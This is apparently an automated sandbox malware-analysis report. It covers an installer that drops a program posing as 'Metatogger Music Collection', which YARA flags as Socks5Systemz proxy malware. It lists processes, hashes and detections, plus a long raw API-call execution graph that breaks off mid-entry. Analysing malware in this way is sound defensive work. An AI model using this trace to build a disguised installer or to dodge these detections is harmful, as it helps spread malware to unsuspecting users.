                                                                          X-Powered-By: PHP/7.4.33
                                                                          Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: e67b680813008c20


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:12:08:48
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x400000
                                                                          File size:2'049'145 bytes
                                                                          MD5 hash:F306EA1FAA91611B7BC26E9CC0BD3956
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:1
                                                                          Start time:12:08:49
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe"
                                                                          Imagebase:0x400000
                                                                          File size:693'760 bytes
                                                                          MD5 hash:8E02BC0DF97F95A1DF3FD1EEE341C73F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:12:08:50
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i
                                                                          Imagebase:0x400000
                                                                          File size:1'853'204 bytes
                                                                          MD5 hash:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:12:08:50
                                                                          Start date:29/03/2024
                                                                          Path:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s
                                                                          Imagebase:0x400000
                                                                          File size:1'853'204 bytes
                                                                          MD5 hash:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          Disassembly

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:21.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:2.3%
                                                                            Total number of Nodes:1514
                                                                            Total number of Limit Nodes:21
                                                                            execution_graph 5096 409d41 5133 409984 5096->5133 5098 409d46 5140 402f24 5098->5140 5100 409d4b 5101 4096e8 15 API calls 5100->5101 5105 409d50 5101->5105 5102 409da3 5103 4026c4 GetSystemTime 5102->5103 5104 409da8 5103->5104 5106 409254 32 API calls 5104->5106 5105->5102 5107 408cfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5105->5107 5108 409db0 5106->5108 5110 409d7f 5107->5110 5109 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5108->5109 5111 409dbd 5109->5111 5112 409d87 MessageBoxA 5110->5112 5113 406888 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5111->5113 5112->5102 5114 409d94 5112->5114 5115 409dca 5113->5115 5117 4057b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5114->5117 5116 406620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5115->5116 5118 409dda 5116->5118 5117->5102 5119 406598 LocalAlloc TlsSetValue TlsGetValue TlsGetValue CharPrevA 5118->5119 5120 409deb 5119->5120 5121 403340 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5120->5121 5122 409df9 5121->5122 5123 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5122->5123 5124 409e09 5123->5124 5125 407440 23 API calls 5124->5125 5126 409e48 5125->5126 5127 402594 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5126->5127 5128 409e68 5127->5128 5129 40794c LocalAlloc TlsSetValue TlsGetValue TlsGetValue InterlockedExchange 5128->5129 5130 409eaa 5129->5130 5131 407bdc 23 API calls 5130->5131 5132 409ed1 5131->5132 5134 4099a5 5133->5134 5135 40998d 5133->5135 5137 4057e0 4 API calls 5134->5137 5145 4057e0 5135->5145 5139 4099b6 5137->5139 5138 40999f 5138->5098 5139->5098 5141 403154 4 API calls 5140->5141 5142 402f29 5141->5142 5181 402bcc 5142->5181 5144 402f51 5144->5144 5146 4057e7 5145->5146 5149 4031e8 5146->5149 5150 4031ec 5149->5150 5151 4031fc 5149->5151 5150->5151 5155 403254 5150->5155 5152 403228 5151->5152 5160 4025ac 5151->5160 5152->5138 5156 403274 5155->5156 5157 403258 5155->5157 5156->5151 5164 402594 5157->5164 5159 403261 5159->5151 5161 4025b0 5160->5161 5162 4025ba 5160->5162 5161->5162 5163 403154 4 API calls 5161->5163 5162->5152 5162->5162 5163->5162 5165 4025a2 5164->5165 5166 402598 5164->5166 5165->5159 5165->5165 5166->5165 5168 403154 5166->5168 5169 403164 5168->5169 5170 40318c TlsGetValue 5168->5170 5169->5165 5171 403196 5170->5171 5172 40316f 5170->5172 5171->5165 5176 40310c 5172->5176 5174 403174 TlsGetValue 5175 403184 5174->5175 5175->5165 5177 403120 LocalAlloc 5176->5177 5178 403116 5176->5178 5179 40313e TlsSetValue 5177->5179 5180 403132 5177->5180 5178->5177 5179->5180 5180->5174 5182 402bd5 RaiseException 5181->5182 5183 402be6 5181->5183 5182->5183 5183->5144 6182 408f42 6183 408f34 6182->6183 6184 408ed0 Wow64RevertWow64FsRedirection 6183->6184 6185 408f3c 6184->6185 6186 408f44 SetLastError 6187 408f4d 6186->6187 6188 402b48 RaiseException 6195 40294a 6196 402952 6195->6196 6197 403554 4 API calls 6196->6197 6198 402967 6196->6198 6197->6196 6199 403f4a 6200 403f53 6199->6200 6201 403f5c 6199->6201 6203 403f07 6200->6203 6206 403f09 6203->6206 6204 403f3c 6204->6201 6208 403e9c 6206->6208 6209 403154 4 API calls 6206->6209 6215 403f3d 6206->6215 6226 403e9c 6206->6226 6207 403ef2 6211 402674 4 API calls 6207->6211 6208->6204 6208->6207 6213 403ea9 6208->6213 6217 403e8e 6208->6217 6209->6206 6212 403ecf 6211->6212 6212->6201 6213->6212 6216 402674 4 API calls 6213->6216 6215->6201 6216->6212 6218 403e4c 6217->6218 6219 403e67 6218->6219 6220 403e62 6218->6220 6221 403e7b 6218->6221 6224 403e78 6219->6224 6225 402674 4 API calls 6219->6225 6222 403cc8 4 API calls 6220->6222 6223 402674 4 API calls 6221->6223 6222->6219 6223->6224 6224->6207 6224->6213 6225->6224 6227 403ed7 6226->6227 6232 403ea9 6226->6232 6228 403ef2 6227->6228 6229 403e8e 4 API calls 6227->6229 6230 402674 4 API calls 6228->6230 6233 403ee6 6229->6233 6231 403ecf 6230->6231 6231->6206 6232->6231 6234 402674 4 API calls 6232->6234 6233->6228 6233->6232 6234->6231 5884 403a52 5885 403a74 5884->5885 5886 403a5a WriteFile 5884->5886 5886->5885 5887 403a78 GetLastError 5886->5887 5887->5885 5888 402654 5889 403154 4 API calls 5888->5889 5890 402614 5889->5890 5891 402632 5890->5891 5892 403154 4 API calls 5890->5892 5892->5891 5893 408e54 5896 408d20 5893->5896 5897 408d29 5896->5897 5898 403198 4 API calls 5897->5898 5899 408d37 5897->5899 5898->5897 6239 40755a GetFileSize 6240 407586 6239->6240 6241 407576 GetLastError 6239->6241 6241->6240 6242 40757f 6241->6242 6243 4073ec 21 API calls 6242->6243 6243->6240 6244 406f5b 6245 406f68 SetErrorMode 6244->6245 6250 40a161 6251 40a0d3 6250->6251 6252 4093fc 9 API calls 6251->6252 6254 40a0ff 6251->6254 6252->6254 6253 40a118 6255 40a121 73A15CF0 6253->6255 6256 40a12c 6253->6256 6254->6253 6258 40a112 RemoveDirectoryA 6254->6258 6255->6256 6257 40a154 6256->6257 6259 40357c 4 API calls 6256->6259 6258->6253 6260 40a14a 6259->6260 6261 4025ac 4 API calls 6260->6261 6261->6257 5904 402e64 5905 402e69 5904->5905 5906 402e7a RtlUnwind 5905->5906 5907 402e5e 5905->5907 5908 402e9d 5906->5908 6266 40a168 6267 40a19a 6266->6267 6268 40a16f 6266->6268 6270 403198 4 API calls 6267->6270 6276 40936c 6268->6276 6272 40a1d2 6270->6272 6271 40a174 6271->6267 6273 40a192 MessageBoxA 6271->6273 6274 403198 4 API calls 6272->6274 6273->6267 6275 40a1da 6274->6275 6277 4093d3 ExitWindowsEx 6276->6277 6278 409378 GetCurrentProcess OpenProcessToken 6276->6278 6280 40938a 6277->6280 6279 40938e LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6278->6279 6278->6280 6279->6277 6279->6280 6280->6271 5676 406f77 5677 406f68 SetErrorMode 5676->5677 6293 403f7d 6294 403fa2 6293->6294 6297 403f84 6293->6297 6296 403e8e 4 API calls 6294->6296 6294->6297 6295 403f8c 6296->6297 6297->6295 6298 402674 4 API calls 6297->6298 6299 403fca 6298->6299 6300 403d02 6305 403d12 6300->6305 6301 403ddf ExitProcess 6302 403db8 6303 403cc8 4 API calls 6302->6303 6306 403dc2 6303->6306 6304 403dea 6305->6301 6305->6302 6305->6304 6310 403da4 6305->6310 6311 403d8f MessageBoxA 6305->6311 6307 403cc8 4 API calls 6306->6307 6308 403dcc 6307->6308 6320 4019dc 6308->6320 6316 403fe4 6310->6316 6311->6302 6312 403dd1 6312->6301 6312->6304 6317 403fe8 6316->6317 6318 403f07 4 API calls 6317->6318 6319 404006 6318->6319 6321 401abb 6320->6321 6322 4019ed 6320->6322 6321->6312 6323 401a04 RtlEnterCriticalSection 6322->6323 6324 401a0e LocalFree 6322->6324 6323->6324 6325 401a41 6324->6325 6326 401a2f VirtualFree 6325->6326 6327 401a49 6325->6327 6326->6325 6328 401a70 LocalFree 6327->6328 6329 401a87 6327->6329 6328->6328 6328->6329 6330 401aa9 RtlDeleteCriticalSection 6329->6330 6331 401a9f RtlLeaveCriticalSection 6329->6331 6330->6312 6331->6330 5917 404206 5918 4041cc 5917->5918 5921 40420a 5917->5921 5919 404282 5920 403154 4 API calls 5922 404323 5920->5922 5921->5919 5921->5920 5923 402c08 5924 402c82 5923->5924 5927 402c19 5923->5927 5925 402c56 RtlUnwind 5926 403154 4 API calls 5925->5926 5926->5924 5927->5924 5927->5925 5930 402b28 5927->5930 5931 402b31 RaiseException 5930->5931 5932 402b47 5930->5932 5931->5932 5932->5925 6342 409f0b 6343 409984 4 API calls 6342->6343 6344 409f10 6343->6344 6345 409f15 6344->6345 6346 402f24 5 API calls 6344->6346 6347 407878 InterlockedExchange 6345->6347 6346->6345 6348 409f3f 6347->6348 6349 409f4f 6348->6349 6350 409984 4 API calls 6348->6350 6351 40760c 22 API calls 6349->6351 6350->6349 6352 409f6b 6351->6352 6353 4025ac 4 API calls 6352->6353 6354 409fa2 6353->6354 5864 40760c SetEndOfFile 5865 407623 5864->5865 5866 40761c 5864->5866 5867 4073ec 21 API calls 5866->5867 5867->5865 5933 403018 5934 403025 5933->5934 5938 403070 5933->5938 5935 40302a RtlUnwind 5934->5935 5936 40304e 5935->5936 5939 402f78 5936->5939 5940 402be8 5936->5940 5941 402bf1 RaiseException 5940->5941 5942 402c04 5940->5942 5941->5942 5942->5938 5947 407c23 5950 407c29 5947->5950 5948 40322c 4 API calls 5949 407cc1 5948->5949 5951 4032fc 4 API calls 5949->5951 5950->5948 5952 407ccb 5951->5952 5953 4057e0 4 API calls 5952->5953 5954 407cda 5953->5954 5955 403198 4 API calls 5954->5955 5956 407cf4 5955->5956 5184 407524 SetFilePointer 5185 407557 5184->5185 5186 407547 GetLastError 5184->5186 5186->5185 5187 407550 5186->5187 5189 4073ec GetLastError 5187->5189 5192 40734c 5189->5192 5201 4071e4 FormatMessageA 5192->5201 5195 407394 5197 4057e0 4 API calls 5195->5197 5198 4073a3 5197->5198 5208 403198 5198->5208 5202 40720a 5201->5202 5212 403278 5202->5212 5205 4050e4 5217 4050f8 5205->5217 5209 4031b7 5208->5209 5210 40319e 5208->5210 5209->5185 5210->5209 5211 4025ac 4 API calls 5210->5211 5211->5209 5213 403254 4 API calls 5212->5213 5214 403288 5213->5214 5215 403198 4 API calls 5214->5215 5216 4032a0 5215->5216 5216->5195 5216->5205 5218 405115 5217->5218 5225 404da8 5218->5225 5221 405141 5223 403278 4 API calls 5221->5223 5224 4050f3 5223->5224 5224->5195 5228 404dc3 5225->5228 5226 404dd5 5226->5221 5230 404b34 5226->5230 5228->5226 5233 404eca 5228->5233 5240 404d9c 5228->5240 5331 405890 5230->5331 5232 404b45 5232->5221 5234 404edb 5233->5234 5236 404f29 5233->5236 5234->5236 5237 404faf 5234->5237 5239 404f47 5236->5239 5243 404d44 5236->5243 5237->5239 5247 404d88 5237->5247 5239->5228 5241 403198 4 API calls 5240->5241 5242 404da6 5241->5242 5242->5228 5244 404d52 5243->5244 5250 404b4c 5244->5250 5246 404d80 5246->5236 5270 4039a4 5247->5270 5253 405900 5250->5253 5252 404b65 5252->5246 5254 40590e 5253->5254 5263 404c2c LoadStringA 5254->5263 5257 4050e4 19 API calls 5258 405946 5257->5258 5259 4031e8 4 API calls 5258->5259 5260 405951 5259->5260 5266 4031b8 5260->5266 5264 403278 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5263->5264 5265 404c59 5264->5265 5265->5257 5268 4031be 5266->5268 5267 4031e3 5267->5252 5268->5267 5269 4025ac LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5268->5269 5269->5268 5271 4039ab 5270->5271 5276 4038b4 5271->5276 5273 4039cb 5274 403198 4 API calls 5273->5274 5275 4039d2 5274->5275 5275->5239 5277 4038d5 5276->5277 5278 4038c8 5276->5278 5280 403934 5277->5280 5281 4038db 5277->5281 5304 403780 5278->5304 5282 403993 5280->5282 5283 40393b 5280->5283 5285 4038e1 5281->5285 5286 4038ee 5281->5286 5288 4037f4 3 API calls 5282->5288 5289 403941 5283->5289 5290 40394b 5283->5290 5284 4038d0 5284->5273 5311 403894 5285->5311 5287 403894 6 API calls 5286->5287 5292 4038fc 5287->5292 5288->5284 5326 403864 5289->5326 5294 4037f4 3 API calls 5290->5294 5316 4037f4 5292->5316 5295 40395d 5294->5295 5297 403864 9 API calls 5295->5297 5299 403976 5297->5299 5298 403917 5322 40374c 5298->5322 5301 40374c VariantClear 5299->5301 5303 40398b 5301->5303 5302 40392c 5302->5273 5303->5273 5305 4037f0 5304->5305 5306 403744 5304->5306 5305->5284 5306->5304 5307 403793 VariantClear 5306->5307 5308 403198 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5306->5308 5309 4037dc VariantCopyInd 5306->5309 5310 4037ab 5306->5310 5307->5306 5308->5306 5309->5305 5309->5306 5310->5284 5312 4036b8 MultiByteToWideChar SysAllocStringLen MultiByteToWideChar SysAllocStringLen MultiByteToWideChar 5311->5312 5313 4038a0 5312->5313 5314 40374c VariantClear 5313->5314 5315 4038a9 5314->5315 5315->5284 5317 403845 VariantChangeTypeEx 5316->5317 5318 40380a VariantChangeTypeEx 5316->5318 5321 403832 5317->5321 5319 403826 5318->5319 5320 40374c VariantClear 5319->5320 5320->5321 5321->5298 5323 403766 5322->5323 5324 403759 5322->5324 5323->5302 5324->5323 5325 403779 VariantClear 5324->5325 5325->5302 5327 40369c 8 API calls 5326->5327 5328 40387b 5327->5328 5329 40374c VariantClear 5328->5329 5330 403882 5329->5330 5330->5284 5332 40589c 5331->5332 5333 404c2c 5 API calls 5332->5333 5334 4058c2 5333->5334 5335 4031e8 4 API calls 5334->5335 5336 4058cd 5335->5336 5337 403198 4 API calls 5336->5337 5338 4058e2 5337->5338 5338->5232 5339 409b24 5378 4030dc 5339->5378 5341 409b3a 5381 4042e8 5341->5381 5343 409b3f 5384 406518 5343->5384 5347 409b49 5394 408fc8 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5347->5394 5356 4031e8 4 API calls 5357 409b95 5356->5357 5430 407440 5357->5430 5362 409984 4 API calls 5364 409c22 5362->5364 5450 407400 5364->5450 5366 409be4 5366->5362 5366->5364 5367 409c63 5454 40794c 5367->5454 5368 409c48 5368->5367 5369 409984 4 API calls 5368->5369 5369->5367 5371 409c88 5464 408a2c 5371->5464 5375 408a2c 23 API calls 5377 409cce 5375->5377 5376 409d07 5377->5375 5377->5376 5486 403094 5378->5486 5380 4030e1 GetModuleHandleA GetCommandLineA 5380->5341 5382 403154 4 API calls 5381->5382 5383 404323 5381->5383 5382->5383 5383->5343 5487 405bf8 5384->5487 5393 406564 6F561CD0 5393->5347 5395 40901b 5394->5395 5577 406f00 SetErrorMode 5395->5577 5398 4071e4 5 API calls 5399 40904b 5398->5399 5400 403198 4 API calls 5399->5400 5401 409060 5400->5401 5402 409a14 GetSystemInfo VirtualQuery 5401->5402 5403 409ac8 5402->5403 5406 409a3e 5402->5406 5408 409580 5403->5408 5404 409aa9 VirtualQuery 5404->5403 5404->5406 5405 409a68 VirtualProtect 5405->5406 5406->5403 5406->5404 5406->5405 5407 409a97 VirtualProtect 5406->5407 5407->5404 5583 406b30 GetCommandLineA 5408->5583 5410 40963d 5412 4031b8 4 API calls 5410->5412 5411 406b8c 6 API calls 5415 40959d 5411->5415 5413 409657 5412->5413 5416 406b8c 5413->5416 5414 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5414->5415 5415->5410 5415->5411 5415->5414 5417 406bb3 GetModuleFileNameA 5416->5417 5418 406bd7 GetCommandLineA 5416->5418 5419 403278 4 API calls 5417->5419 5422 406bdc 5418->5422 5420 406bd5 5419->5420 5424 406c04 5420->5424 5421 406be1 5425 403198 4 API calls 5421->5425 5422->5421 5423 406a50 4 API calls 5422->5423 5426 406be9 5422->5426 5423->5422 5427 403198 4 API calls 5424->5427 5425->5426 5428 40322c 4 API calls 5426->5428 5429 406c19 5427->5429 5428->5424 5429->5356 5431 40744a 5430->5431 5604 4074d6 5431->5604 5607 4074d8 5431->5607 5432 407476 5433 40748a 5432->5433 5434 4073ec 21 API calls 5432->5434 5437 409ad0 FindResourceA 5433->5437 5434->5433 5438 409ae5 5437->5438 5439 409aea SizeofResource 5437->5439 5440 409984 4 API calls 5438->5440 5441 409af7 5439->5441 5442 409afc LoadResource 5439->5442 5440->5439 5443 409984 4 API calls 5441->5443 5444 409b0a 5442->5444 5445 409b0f LockResource 5442->5445 5443->5442 5446 409984 4 API calls 5444->5446 5447 409b20 5445->5447 5448 409b1b 5445->5448 5446->5445 5447->5366 5480 407878 5447->5480 5449 409984 4 API calls 5448->5449 5449->5447 5451 407414 5450->5451 5452 407424 5451->5452 5453 40734c 20 API calls 5451->5453 5452->5368 5453->5452 5455 407959 5454->5455 5456 4057e0 4 API calls 5455->5456 5457 4079ad 5455->5457 5456->5457 5458 407878 InterlockedExchange 5457->5458 5459 4079bf 5458->5459 5460 4057e0 4 API calls 5459->5460 5461 4079d5 5459->5461 5460->5461 5462 407a18 5461->5462 5463 4057e0 4 API calls 5461->5463 5462->5371 5463->5462 5468 408a5d 5464->5468 5479 408aa6 5464->5479 5465 408af1 5619 407bdc 5465->5619 5466 407bdc 23 API calls 5466->5468 5467 407bdc 23 API calls 5467->5479 5468->5466 5475 403420 4 API calls 5468->5475 5476 4031e8 4 API calls 5468->5476 5468->5479 5610 4034f0 5468->5610 5471 408b08 5473 4031b8 4 API calls 5471->5473 5472 4034f0 4 API calls 5472->5479 5474 408b22 5473->5474 5483 404b70 5474->5483 5475->5468 5476->5468 5477 403420 4 API calls 5477->5479 5478 4031e8 4 API calls 5478->5479 5479->5465 5479->5467 5479->5472 5479->5477 5479->5478 5672 407824 5480->5672 5484 402594 4 API calls 5483->5484 5485 404b7b 5484->5485 5485->5377 5486->5380 5488 405890 5 API calls 5487->5488 5489 405c09 5488->5489 5490 4051d0 GetSystemDefaultLCID 5489->5490 5493 405206 5490->5493 5491 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5491->5493 5492 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5492->5493 5493->5491 5493->5492 5494 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5493->5494 5498 405268 5493->5498 5494->5493 5495 404c2c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5495->5498 5496 40515c LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5496->5498 5497 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5497->5498 5498->5495 5498->5496 5498->5497 5499 4052eb 5498->5499 5500 4031b8 4 API calls 5499->5500 5501 405305 5500->5501 5502 405314 GetSystemDefaultLCID 5501->5502 5559 40515c GetLocaleInfoA 5502->5559 5505 4031e8 4 API calls 5506 405354 5505->5506 5507 40515c 5 API calls 5506->5507 5508 405369 5507->5508 5509 40515c 5 API calls 5508->5509 5510 40538d 5509->5510 5565 4051a8 GetLocaleInfoA 5510->5565 5513 4051a8 GetLocaleInfoA 5514 4053bd 5513->5514 5515 40515c 5 API calls 5514->5515 5516 4053d7 5515->5516 5517 4051a8 GetLocaleInfoA 5516->5517 5518 4053f4 5517->5518 5519 40515c 5 API calls 5518->5519 5520 40540e 5519->5520 5521 4031e8 4 API calls 5520->5521 5522 40541b 5521->5522 5523 40515c 5 API calls 5522->5523 5524 405430 5523->5524 5525 4031e8 4 API calls 5524->5525 5526 40543d 5525->5526 5527 4051a8 GetLocaleInfoA 5526->5527 5528 40544b 5527->5528 5529 40515c 5 API calls 5528->5529 5530 405465 5529->5530 5531 4031e8 4 API calls 5530->5531 5532 405472 5531->5532 5533 40515c 5 API calls 5532->5533 5534 405487 5533->5534 5535 4031e8 4 API calls 5534->5535 5536 405494 5535->5536 5537 40515c 5 API calls 5536->5537 5538 4054a9 5537->5538 5539 4054c6 5538->5539 5540 4054b7 5538->5540 5542 40322c 4 API calls 5539->5542 5573 40322c 5540->5573 5543 4054c4 5542->5543 5544 40515c 5 API calls 5543->5544 5545 4054e8 5544->5545 5546 405505 5545->5546 5547 4054f6 5545->5547 5549 403198 4 API calls 5546->5549 5548 40322c 4 API calls 5547->5548 5550 405503 5548->5550 5549->5550 5567 4033b4 5550->5567 5552 405527 5553 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5552->5553 5554 405541 5553->5554 5555 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5554->5555 5556 40555b 5555->5556 5557 405c44 GetVersionExA 5556->5557 5558 405c5b 5557->5558 5558->5393 5560 405183 5559->5560 5561 405195 5559->5561 5563 403278 4 API calls 5560->5563 5562 40322c 4 API calls 5561->5562 5564 405193 5562->5564 5563->5564 5564->5505 5566 4051c4 5565->5566 5566->5513 5568 4033bc 5567->5568 5569 403254 4 API calls 5568->5569 5570 4033cf 5569->5570 5571 4031e8 4 API calls 5570->5571 5572 4033f7 5571->5572 5575 403230 5573->5575 5574 403252 5574->5543 5575->5574 5576 4025ac 4 API calls 5575->5576 5576->5574 5581 403414 5577->5581 5580 406f4e 5580->5398 5582 403418 LoadLibraryA 5581->5582 5582->5580 5590 406a50 5583->5590 5585 406b53 5586 406b65 5585->5586 5587 406a50 4 API calls 5585->5587 5588 403198 4 API calls 5586->5588 5587->5585 5589 406b7a 5588->5589 5589->5415 5591 406a7c 5590->5591 5592 403278 4 API calls 5591->5592 5593 406a89 5592->5593 5600 403420 5593->5600 5595 406a91 5596 4031e8 4 API calls 5595->5596 5597 406aa9 5596->5597 5598 403198 4 API calls 5597->5598 5599 406acb 5598->5599 5599->5585 5601 403426 5600->5601 5603 403437 5600->5603 5602 403254 4 API calls 5601->5602 5601->5603 5602->5603 5603->5595 5605 4074d8 5604->5605 5606 407517 CreateFileA 5605->5606 5606->5432 5608 403414 5607->5608 5609 407517 CreateFileA 5608->5609 5609->5432 5611 4034fd 5610->5611 5618 40352d 5610->5618 5613 403526 5611->5613 5615 403509 5611->5615 5612 403198 4 API calls 5614 403517 5612->5614 5616 403254 4 API calls 5613->5616 5614->5468 5627 4025c4 5615->5627 5616->5618 5618->5612 5620 407bf7 5619->5620 5621 407bec 5619->5621 5642 407b80 5620->5642 5631 407dfc 5621->5631 5623 407bf5 5623->5471 5625 4057e0 4 API calls 5625->5623 5628 4025ca 5627->5628 5629 4025dc 5628->5629 5630 403154 4 API calls 5628->5630 5629->5614 5630->5629 5632 407e11 5631->5632 5634 407e20 5632->5634 5649 407d14 5632->5649 5635 407e5a 5634->5635 5637 407d14 19 API calls 5634->5637 5636 407e6e 5635->5636 5638 407d14 19 API calls 5635->5638 5641 407e9a 5636->5641 5646 407da4 5636->5646 5637->5635 5638->5636 5641->5623 5643 407bd3 5642->5643 5644 407b94 5642->5644 5643->5623 5643->5625 5644->5643 5660 407ad0 5644->5660 5647 407db3 VirtualFree 5646->5647 5648 407dc5 VirtualAlloc 5646->5648 5647->5648 5648->5641 5652 405814 5649->5652 5651 407d36 5651->5634 5653 405820 5652->5653 5654 4050e4 19 API calls 5653->5654 5655 40584d 5654->5655 5656 4031e8 4 API calls 5655->5656 5657 405858 5656->5657 5658 403198 4 API calls 5657->5658 5659 40586d 5658->5659 5659->5651 5661 407aec 5660->5661 5662 407adb 5660->5662 5664 407400 20 API calls 5661->5664 5663 4057e0 4 API calls 5662->5663 5663->5661 5665 407b00 5664->5665 5666 407400 20 API calls 5665->5666 5667 407b21 5666->5667 5668 407878 InterlockedExchange 5667->5668 5669 407b36 5668->5669 5670 407b4c 5669->5670 5671 4057e0 4 API calls 5669->5671 5670->5644 5671->5670 5673 407836 5672->5673 5674 407847 5672->5674 5675 40783b InterlockedExchange 5673->5675 5674->5366 5675->5674 5957 405a24 5958 405a34 5957->5958 5959 405a2c 5957->5959 5960 405a32 5959->5960 5961 405a3b 5959->5961 5964 40599c 5960->5964 5962 405890 5 API calls 5961->5962 5962->5958 5965 4059a4 5964->5965 5966 4059be 5965->5966 5969 403154 4 API calls 5965->5969 5967 4059c3 5966->5967 5968 4059da 5966->5968 5970 405890 5 API calls 5967->5970 5971 403154 4 API calls 5968->5971 5969->5965 5973 4059d6 5970->5973 5972 4059df 5971->5972 5974 405900 19 API calls 5972->5974 5975 403154 4 API calls 5973->5975 5974->5973 5976 405a08 5975->5976 5977 403154 4 API calls 5976->5977 5978 405a16 5977->5978 5978->5958 6363 409d26 6364 409d4b 6363->6364 6415 4096e8 6364->6415 6366 409da3 6443 4026c4 GetSystemTime 6366->6443 6368 409da8 6397 409254 6368->6397 6369 409d50 6369->6366 6436 408cfc 6369->6436 6373 409d7f 6376 409d87 MessageBoxA 6373->6376 6374 4031e8 4 API calls 6375 409dbd 6374->6375 6444 406888 6375->6444 6376->6366 6378 409d94 6376->6378 6439 4057b4 6378->6439 6384 409deb 6471 403340 6384->6471 6386 409df9 6387 4031e8 4 API calls 6386->6387 6388 409e09 6387->6388 6389 407440 23 API calls 6388->6389 6390 409e48 6389->6390 6391 402594 4 API calls 6390->6391 6392 409e68 6391->6392 6393 40794c 5 API calls 6392->6393 6394 409eaa 6393->6394 6395 407bdc 23 API calls 6394->6395 6396 409ed1 6395->6396 6406 409274 6397->6406 6400 409299 CreateDirectoryA 6401 409311 6400->6401 6402 4092a3 GetLastError 6400->6402 6403 40322c 4 API calls 6401->6403 6402->6406 6405 40931b 6403->6405 6404 408cfc 4 API calls 6404->6406 6407 4031b8 4 API calls 6405->6407 6406->6400 6406->6404 6408 404be4 19 API calls 6406->6408 6411 4071e4 5 API calls 6406->6411 6413 408ccc 4 API calls 6406->6413 6414 4057e0 4 API calls 6406->6414 6486 406c54 6406->6486 6509 409148 6406->6509 6409 409335 6407->6409 6408->6406 6410 4031b8 4 API calls 6409->6410 6412 409342 6410->6412 6411->6406 6412->6374 6413->6406 6414->6406 6416 409731 6415->6416 6422 4096f5 6415->6422 6417 40973a 6416->6417 6418 40973e 6416->6418 6419 409747 GetUserDefaultLangID 6417->6419 6428 40973c 6417->6428 6615 406f84 GetModuleHandleA GetProcAddress 6418->6615 6419->6428 6422->6416 6425 409721 6422->6425 6423 4097ef 6424 40969c 5 API calls 6423->6424 6426 409728 6424->6426 6427 40969c 5 API calls 6425->6427 6426->6369 6427->6426 6428->6423 6429 409791 6428->6429 6430 409787 GetACP 6428->6430 6431 40979e 6428->6431 6432 40969c 5 API calls 6429->6432 6430->6428 6430->6429 6431->6423 6433 4097e2 6431->6433 6434 4097d8 GetACP 6431->6434 6432->6426 6435 40969c 5 API calls 